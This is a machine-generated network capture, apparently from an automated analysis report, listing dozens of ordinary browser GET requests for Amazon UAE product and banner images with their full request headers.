Source: global trafficHTTP traffic detected: GET /images/G/39/kitchen/janiceo/april_new_dqc/xcm_banners_bau_2021_desktop-quadcard_b09774kt11_379x304_ae-en._SY116_CB623005781_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/G/39/electronics/store/kamja/WebQC/2021/Audio/Feb_AllAudio_1x._SY116_CB659040113_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/G/39/electronics/store/kamja/WebQC/2021/Audio/Feb_Earphones_1x._SY116_CB659040113_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/G/39/electronics/store/kamja/WebQC/2021/Audio/Feb_Gaming_1x._SY116_CB659040113_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/I/81eOmCjD4oL._AC_SY200_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/I/617JAxuDpkL._AC_SY200_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/I/71zAUNa4XRL._AC_SY200_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/I/61oyKtHlCaL._AC_SY200_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/G/39/electronics/store/kamja/WebQC/2021/Audio/Feb_True_1x._SY116_CB659040113_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/G/39/electronic/kamja/Stores/BudgetStore/2404DR14_3__AE_GW_DC_ElectronicsBudget_379x304._SY304_CB554784697_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/I/81tzJSmT2vL._AC_SY200_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/G/39/home/janiceo/dqc_experiment/xcm_banners_tr_bts21_372x232_pp-ezsdz_372x232_ae-en._SY116_CB643136719_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/G/39/home/janiceo/dqc_experiment/xcm_banners_tr_bts21_372x232_pp-0zvf9_372x232_ae-en._SY116_CB643136714_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/I/81fZHA1dDhL._AC_SY200_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/I/61kA0-m5lcL._AC_SY200_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/I/81eOmCjD4oL._AC_SY200_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/I/81ZqHezuUOL._AC_SY200_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/I/61OaibCCrKL._AC_SY200_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/I/61-jK4RR+mL._AC_SY200_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/I/617JAxuDpkL._AC_SY200_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/G/39/home/janiceo/dqc_experiment/xcm_banners_tr_bts21_372x232_pp-vubbe_372x232_ae-en._SY116_CB643136714_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/I/61WB26MsoHL._AC_SY200_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/G/39/home/janiceo/dqc_experiment/xcm_banners_tr_bts21_372x232_pp-d9le7_372x232_ae-en._SY116_CB643136704_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/I/71zAUNa4XRL._AC_SY200_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/G/39/AE-hq/2023/img/Consumer_Electronics/XCM_CUTTLE_1615980_3334867_186x116_1X_en_AE_1._SY116_CB597773556_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/I/61b6kxdob4L._AC_SY200_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/G/39/AE-hq/2023/img/Consumer_Electronics/XCM_CUTTLE_1615980_3334872_186x116_1X_en_AE_3._SY116_CB597773556_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/I/81tzJSmT2vL._AC_SY200_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/I/61nBo0wifmL._AC_SY200_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/G/39/AE-hq/2023/img/Consumer_Electronics/XCM_CUTTLE_1615980_3334873_186x116_1X_en_AE_2._SY116_CB597773556_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/I/61OaibCCrKL._AC_SY200_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/G/39/AE-hq/2023/img/Consumer_Electronics/XCM_CUTTLE_1615980_3334875_186x116_1X_en_AE_4._SY116_CB597773556_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/I/61-jK4RR+mL._AC_SY200_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/I/81ZqHezuUOL._AC_SY200_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/G/39/UAE-hq/2020/img/Apparel/XCM_CUTTLE_1230335_1213328_UAE_3151165_153x125_en_AE._SY116_CB428587699_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/G/39/UAE-hq/2020/img/Apparel/XCM_CUTTLE_1230335_1213331_UAE_3151168_153x125_en_AE._SY116_CB428587699_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/I/61WB26MsoHL._AC_SY200_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/I/61f7uyPypDL._AC_SY200_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/I/618LrXHTM3L._AC_SY200_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/I/81-cKwx9+lL._AC_SY200_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/I/61b6kxdob4L._AC_SY200_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/I/71qrtZlAzuL._AC_SY200_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
